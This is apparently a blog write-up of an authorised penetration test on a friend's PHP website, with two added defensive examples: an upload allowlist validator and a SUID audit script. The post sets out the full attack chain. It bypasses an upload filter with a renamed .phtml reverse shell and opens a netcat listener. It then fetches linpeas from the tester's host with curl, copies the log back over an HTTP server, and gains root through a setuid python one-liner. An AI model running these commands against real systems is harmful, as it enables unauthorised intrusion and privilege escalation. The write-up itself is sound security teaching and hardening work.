As a Unix/Linux specialist I’ve seen my fair share of misconfigurations and sometimes really stupid ways to get things done. "From python with love" is one of those real stories I will never forget. And it all begins on a cold autumn day in 2020.

A friend of mine is a PHP developer and was working on a site for his customer. He called me to ask me to test the website and to see if there is a way to hack the site. I’m not a PHP developer, but I know my way around PHP and I also know its shortcomings and the possible ways to attack it.

Getting the information

The first step is always to gather your information. My friend provided me with an IP address and a hostname, because the server and website don’t have a fully qualified domain name. For security purposes I will use the IP address 172.16.0.100.

Getting the open ports

I know I’m going to test a website, so I expect the default ports for HTTP (80) and HTTPS (443) to be open, but nowadays nginx is used a lot and it uses php-fpm with FastCGI on a separate port. For this reason we are going to scan the server with nmap.

# let's create a clean working directory
mkdir -p pentest/logs
cd pentest

# running a default nmap scan on the target system
#
# -sC run the default (safe) nmap scripts
# -sV get the versions of the services
# -oN logs/initial-nmap.log write normal output to a file
export ip=172.16.0.100
nmap -sC -sV -oN logs/initial-nmap.log ${ip}

Nmap scan report for 172.16.0.100
Host is up (0.031s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_  256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 21 12:35:27 2020 -- 1 IP address (1 host up) scanned in 8.50 seconds

Getting the webserver directories

Hmmm, looks like there is no HTTPS/SSL configured. Configuring SSL is not difficult, but this is a point that needs to be addressed. But we carry on. Apache is running on port 80 and a PHP session is created. Also port 22 is open; port 22 is used by SSH, a secure (remote) shell. Let’s run some enumeration on the webserver and see if there are directories to use or exploit.

# using gobuster to enumerate the directory structure of the website
# the wordlist is a default wordlist in Kali Linux
gobuster dir -u "http://${ip}" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee logs/gobuster.log


===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://172.16.0.100
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/21 13:01:56 Starting gobuster
===============================================================
/uploads (Status: 301)
/css (Status: 301)
/js (Status: 301)
/panel (Status: 301)
/server-status (Status: 403)

Attack vector: PHP upload page

Most of the directories are as expected, but /panel is getting some of my attention. For security and privacy reasons I can’t show you the page, but it is a simple PHP upload page. This could potentially be an attack vector.

Getting a reverse shell

Let’s see if the upload page is configured well, so it will not accept default scripting languages like PHP or something similar. After downloading the PHP reverse shell I try to upload this file.

Well done, the extension .php is not allowed to be uploaded. This could be done in the code by checking the extension, but the site could also check the header of the file.

# rename the reverse shell and give it another extension
mv php-reverse-shell.php php-reverse-shell.phtml

The extension .phtml is a lesser-known extension for PHP. Let’s try to upload this. Touché, the extension .phtml is allowed.
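The lesson of this bypass, as an added example that is not part of the original post or of the site's code: the weak check the upload form effectively performed (reject only `.php`) next to an allowlist check that also verifies the file content against the claimed type and lets the server, not the client, pick the stored name. The allowed types, the signature table and the function names are my own assumptions for this example.

```python
"""Server-side upload validation: extension blocklist versus allowlist plus content check.

Added example (not the page's or the site's code). Shows why rejecting a
single extension lets .phtml through, and how an allowlist combined with a
magic-byte check avoids the whole class of renamed-script uploads.
"""
import os
import secrets
from typing import Tuple

# Assumption for this example: the form is meant to accept images only.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# File signatures (magic bytes) the content must carry for each allowed type.
MAGIC = {
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
}


def blocklist_check(filename: str) -> bool:
    """The weak check described on the page: reject only '.php'.

    Returns True when the upload would be accepted. Every other extension the
    interpreter handles (.phtml among them) passes, which is the defect.
    """
    return not filename.lower().endswith(".php")


def allowlist_check(filename: str, data: bytes) -> Tuple[bool, str]:
    """Hardened check: every extension segment must be allowlisted and the
    content must start with the signature of the claimed type.

    Returns (accepted, reason) on rejection or (accepted, stored_name) on success.
    """
    base = os.path.basename(filename)
    parts = base.lower().split(".")
    if len(parts) < 2 or parts[0] == "":
        return False, "no extension"
    # Double extensions such as image.php.png: every segment after the
    # first must itself be an allowed extension, otherwise reject.
    exts = parts[1:]
    for ext in exts:
        if ext not in ALLOWED_EXTENSIONS:
            return False, f"extension .{ext} not allowed"
    ext = exts[-1]
    if not any(data.startswith(sig) for sig in MAGIC[ext]):
        return False, f"content does not match .{ext}"
    # Store under a server-chosen random name so the client controls neither
    # the name nor the location of the file on disk.
    return True, f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed sample inputs: a renamed PHP script and a real PNG header.
    print(blocklist_check("php-reverse-shell.phtml"))           # True: weak check lets it through
    print(allowlist_check("php-reverse-shell.phtml", b"<?php"))  # (False, 'extension .phtml not allowed')
    print(allowlist_check("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8))
```

Validating the content is what the page later calls "checking the header"; the allowlist on the name is what stops the rename trick, and the two together still only make sense when the upload directory is served without script execution.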

Local system shell

After uploading php-reverse-shell.phtml we can access the PHP code at http://172.16.0.100/uploads/php-reverse-shell.phtml . Before we activate the reverse shell, we need to set up a listener on our system.

# using netcat to create a default listener
nc -lnvp 9999
$

# yep we've got a shell, now we need to stabilize it
python -c "import pty; pty.spawn('/bin/bash')"

# press ctrl + z to background the shell, fix the local terminal, then bring it back
stty raw -echo
fg
www-data@host ~$ export TERM=xterm
www-data@host ~$

From python with love

Now we have a stable reverse/remote shell to the server and we can try to escalate the privileges of the user www-data. The user www-data is the system account of the Apache webserver and should not have a lot of permissions on the server.

Enumerating the system

To find possible attack vectors we can use linpeas to search for possible exploits. But the reverse shell as www-data has no built-in way to transfer files. Python can be used for that instead, since the shell we created was created with Python.

# running python's simple http server on the local host (python 2 module name)
python -m SimpleHTTPServer 8000
# in the reverse shell: getting linpeas
# we are working in /dev/shm because we have write permissions there
curl http://kali.brakkedoos.nl:8000/linpeas.sh > /dev/shm/linpeas.sh
cd /dev/shm

# changing permissions on linpeas.sh so we can execute it
chmod +x linpeas.sh

# running linpeas.sh to find exploits
./linpeas.sh | tee linpeas.log

# creating a python simple http server on the target to copy the log to our system
python -m SimpleHTTPServer 8080
# on the local system
curl http://172.16.0.100:8080/linpeas.log > logs/linpeas.log

The SUID bit

After examination of the linpeas log I found that there is a program with a SUID bit. The SUID bit on Linux will run a command with the privileges of the owner of the program. In this case /usr/bin/python has the SUID bit set and /usr/bin/python is owned by root. We have already seen that Python can spawn a shell, but this is done in another way than we did before.

# using the setuid python to drop a root shell
/usr/bin/python -c 'import os; os.execl("/bin/bash", "bash", "-p")'
bash4.1 ~#

# there we have the root shell and the server is compromised.
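The defender's counterpart to what linpeas found, added here and not taken from the original post: an audit that collects setuid-root files and flags interpreters or shells (the case of /usr/bin/python above) and anything else missing from a baseline of expected setuid binaries. The baseline set, the interpreter name list and the function names are assumptions for this example; build the real baseline from a fresh install of the same distribution.

```python
"""SUID audit: list setuid-root files and flag anything not on a baseline.

Added example (not the author's code). scan_suid() walks the real filesystem,
classify() holds the policy; the constructed SAMPLE_ENTRIES let the policy be
checked offline without root or a live host.
"""
import os
import stat
from typing import Dict, Iterable, List, Tuple

# Assumed baseline: setuid-root binaries a stock install is expected to carry.
EXPECTED_SUID_ROOT = {
    "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/sudo", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/pkexec", "/usr/lib/openssh/ssh-keysign",
}

# Shells and script interpreters: setuid root on any of these hands the
# invoker a root shell, as the page shows with /usr/bin/python.
INTERPRETER_NAMES = ("python", "perl", "ruby", "php", "lua", "node",
                     "bash", "dash", "zsh", "sh")

# Constructed sample (path, st_mode, st_uid) entries, modelled on the page's host.
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", 0o104755, 0),        # expected setuid root
    ("/usr/bin/python", 0o104755, 0),        # the finding from the page
    ("/usr/bin/python2.7", 0o104755, 0),     # versioned interpreter name
    ("/usr/local/bin/backup", 0o104755, 0),  # setuid root, not in baseline
    ("/usr/bin/ls", 0o100755, 0),            # no setuid bit: ignored
    ("/usr/games/highscore", 0o104755, 1000),  # setuid to a non-root user
]


def is_interpreter(path: str) -> bool:
    """True for shells and interpreters, with or without a version suffix
    (python, python3, python2.7, php7.4, ...)."""
    name = os.path.basename(path)
    for n in INTERPRETER_NAMES:
        if name == n:
            return True
        suffix = name[len(n):]
        if name.startswith(n) and suffix and suffix.replace(".", "").isdigit():
            return True
    return False


def classify(entries: Iterable[Tuple[str, int, int]]) -> Dict[str, List[str]]:
    """Group setuid-root files: interpreters are critical, files outside the
    baseline are unexpected, the rest are expected. Non-setuid and
    non-root-owned entries are skipped."""
    report: Dict[str, List[str]] = {"critical": [], "unexpected": [], "expected": []}
    for path, mode, uid in entries:
        if not mode & stat.S_ISUID or uid != 0:
            continue
        if is_interpreter(path):
            report["critical"].append(path)
        elif path in EXPECTED_SUID_ROOT:
            report["expected"].append(path)
        else:
            report["unexpected"].append(path)
    for key in report:
        report[key].sort()
    return report


def scan_suid(roots=("/usr", "/bin", "/sbin", "/opt")) -> List[Tuple[str, int, int]]:
    """Collect (path, mode, uid) for regular files with the setuid bit,
    the equivalent of `find <roots> -perm -4000 -type f`."""
    found = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for f in files:
                p = os.path.join(dirpath, f)
                try:
                    st = os.lstat(p)
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                    found.append((p, st.st_mode, st.st_uid))
    return found


def demo() -> Dict[str, List[str]]:
    """Run the policy over the constructed sample instead of the live host."""
    return classify(SAMPLE_ENTRIES)


if __name__ == "__main__":
    rep = classify(scan_suid())
    for level in ("critical", "unexpected"):
        for p in rep[level]:
            print(f"{level.upper()}: setuid root {p}")
```

Run it from a cron job or a configuration-management check and alert on any line in the critical or unexpected groups; on the page's host it would have reported /usr/bin/python long before a web shell did.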

Conclusion

PHP can be dangerous if you misconfigure or misuse it. By checking only the extension of an upload and not its header, you can create a place to upload exploitable scripts. Also the use of SUID on programs that can spawn a shell is a big issue. There are programs that need the SUID bit, like passwd or su, but that is set while installing the system.

The reason why python has a SUID bit is not known to me, but it is not normally done. And as shown, it is dangerous.

I reported my findings and reconfigured the server, so this issue is resolved. My friend updated the code and uploaded files are now checked on their headers. While this could potentially also be exploited, it is a safe way to go when upload functionality is required. But the best way is to configure PHP so that it cannot run uploaded scripts.